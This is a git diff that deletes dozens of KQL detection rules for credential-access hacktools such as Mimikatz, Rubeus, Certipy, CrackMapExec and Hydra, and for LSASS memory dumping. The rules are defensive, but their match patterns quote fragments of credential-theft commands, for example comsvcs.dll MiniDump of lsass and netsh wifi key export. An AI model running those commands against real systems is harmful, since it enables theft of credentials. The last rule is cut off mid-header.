diff --git a/Credential Access/HackTool_-_ADCSPwn_Execution.kql b/Credential Access/HackTool_-_ADCSPwn_Execution.kql
deleted file mode 100644
index 36f7298a..00000000
--- a/Credential Access/HackTool_-_ADCSPwn_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/31
-// Level: high
-// Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
-// Tags: attack.credential_access, attack.t1557.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " --adcs " and ProcessCommandLine contains " --port "
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Certify_Execution.kql b/Credential Access/HackTool_-_Certify_Execution.kql
deleted file mode 100644
index 1f56d25c..00000000
--- a/Credential Access/HackTool_-_Certify_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Certipy_Execution.kql b/Credential Access/HackTool_-_Certipy_Execution.kql
deleted file mode 100644
index 39f45158..00000000
--- a/Credential Access/HackTool_-_Certipy_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_CrackMapExec_Execution.kql b/Credential Access/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Credential Access/HackTool_-_CrackMapExec_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql b/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql
deleted file mode 100644
index 8b3ce06f..00000000
--- a/Credential Access/HackTool_-_CrackMapExec_Process_Patterns.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/12
-// Level: high
-// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql b/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql
deleted file mode 100644
index 666d65b4..00000000
--- a/Credential Access/HackTool_-_Dumpert_Process_Dumper_Default_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/02/04
-// Level: critical
-// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql b/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql
deleted file mode 100644
index 3733349a..00000000
--- a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/27
-// Level: high
-// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
-// Tags: attack.credential_access, attack.t1110.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql b/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql
deleted file mode 100644
index 271ce887..00000000
--- a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vasiliy Burov
-// Date: 2020/10/05
-// Level: high
-// Description: Detects command line parameters used by Hydra password guessing hack tool
-// Tags: attack.credential_access, attack.t1110, attack.t1110.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Inveigh_Execution.kql b/Credential Access/HackTool_-_Inveigh_Execution.kql
deleted file mode 100644
index 55ed6692..00000000
--- a/Credential Access/HackTool_-_Inveigh_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/24
-// Level: critical
-// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql b/Credential Access/HackTool_-_KrbRelayUp_Execution.kql
deleted file mode 100644
index d07c94db..00000000
--- a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/26
-// Level: high
-// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
-// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_KrbRelay_Execution.kql b/Credential Access/HackTool_-_KrbRelay_Execution.kql
deleted file mode 100644
index 41c083fa..00000000
--- a/Credential Access/HackTool_-_KrbRelay_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the use of KrbRelay, a Kerberos relaying tool
-// Tags: attack.credential_access, attack.t1558.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Mimikatz_Execution.kql b/Credential Access/HackTool_-_Mimikatz_Execution.kql
deleted file mode 100644
index dc21b4df..00000000
--- a/Credential Access/HackTool_-_Mimikatz_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
-// Date: 2019/10/22
-// Level: high
-// Description: Detection well-known mimikatz command line arguments
-// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql b/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql
deleted file mode 100644
index 981465c3..00000000
--- a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: high
-// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql b/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql
deleted file mode 100644
index aee2a9e3..00000000
--- a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/05
-// Level: high
-// Description: Detects usage of the Quarks PwDump tool via commandline arguments
-// Tags: attack.credential_access, attack.t1003.002
-DeviceProcessEvents
-| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_Rubeus_Execution.kql b/Credential Access/HackTool_-_Rubeus_Execution.kql
deleted file mode 100644
index 134f2523..00000000
--- a/Credential Access/HackTool_-_Rubeus_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
-// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_SafetyKatz_Execution.kql b/Credential Access/HackTool_-_SafetyKatz_Execution.kql
deleted file mode 100644
index 2931012e..00000000
--- a/Credential Access/HackTool_-_SafetyKatz_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/20
-// Level: critical
-// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_SecurityXploded_Execution.kql b/Credential Access/HackTool_-_SecurityXploded_Execution.kql
deleted file mode 100644
index 6a2b1712..00000000
--- a/Credential Access/HackTool_-_SecurityXploded_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of SecurityXploded Tools
-// Tags: attack.credential_access, attack.t1555
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/Credential Access/HackTool_-_WinPwn_Execution.kql b/Credential Access/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Credential Access/HackTool_-_WinPwn_Execution.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql b/Credential Access/Hacktool_Execution_-_PE_Metadata.kql
deleted file mode 100644
index 9f37a725..00000000
--- a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
-// Tags: attack.credential_access, attack.t1588.002, attack.t1003
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Cube0x0"
\ No newline at end of file
diff --git a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
deleted file mode 100644
index 7d6acba4..00000000
--- a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020/04/20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql
deleted file mode 100644
index ed32575d..00000000
--- a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
-// Tags: attack.credential_access, attack.t1003.003
-DeviceProcessEvents
-| where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql b/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql
deleted file mode 100644
index 3e04ec9d..00000000
--- a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
-
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql b/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql
deleted file mode 100644
index 64fa624b..00000000
--- a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash
-// Date: 2022/12/08
-// Level: high
-// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql b/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql
deleted file mode 100644
index 1315b6f9..00000000
--- a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/10/19
-// Level: high
-// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Memory_Dump_Files.kql b/Credential Access/LSASS_Process_Memory_Dump_Files.kql
deleted file mode 100644
index ef02e00f..00000000
--- a/Credential Access/LSASS_Process_Memory_Dump_Files.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/15
-// Level: high
-// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where (FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdump" or FolderPath contains "\\lsassdmp") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or (FolderPath endswith ".dmp" and FolderPath startswith "nanodump")
\ No newline at end of file
diff --git a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql
deleted file mode 100644
index 5a56bd67..00000000
--- a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
-// Tags: attack.credential_access, attack.t1552.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass")
\ No newline at end of file
diff --git a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql b/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql
deleted file mode 100644
index 2fa5f37f..00000000
--- a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @pbssubhash
-// Date: 2022/12/08
-// Level: high
-// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType")
\ No newline at end of file
diff --git a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql b/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql
deleted file mode 100644
index 8e3a1035..00000000
--- a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/28
-// Level: high
-// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql b/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql
deleted file mode 100644
index 633a86ce..00000000
--- a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
-// Date: 2022/11/08
-// Level: high
-// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/Credential Access/Mimikatz_Kirbi_File_Creation.kql b/Credential Access/Mimikatz_Kirbi_File_Creation.kql
deleted file mode 100644
index 29c1c896..00000000
--- a/Credential Access/Mimikatz_Kirbi_File_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), David ANDRE
-// Date: 2021/11/08
-// Level: critical
-// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
-// Tags: attack.credential_access, attack.t1558
-DeviceFileEvents
-| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/Credential Access/NPPSpy_Hacktool_Usage.kql b/Credential Access/NPPSpy_Hacktool_Usage.kql
deleted file mode 100644
index 5b0bddd5..00000000
--- a/Credential Access/NPPSpy_Hacktool_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/29
-// Level: high
-// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
-// Tags: attack.credential_access
-DeviceFileEvents
-| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/Credential Access/NTDS.DIT_Created.kql b/Credential Access/NTDS.DIT_Created.kql
deleted file mode 100644
index 09925740..00000000
--- a/Credential Access/NTDS.DIT_Created.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: low
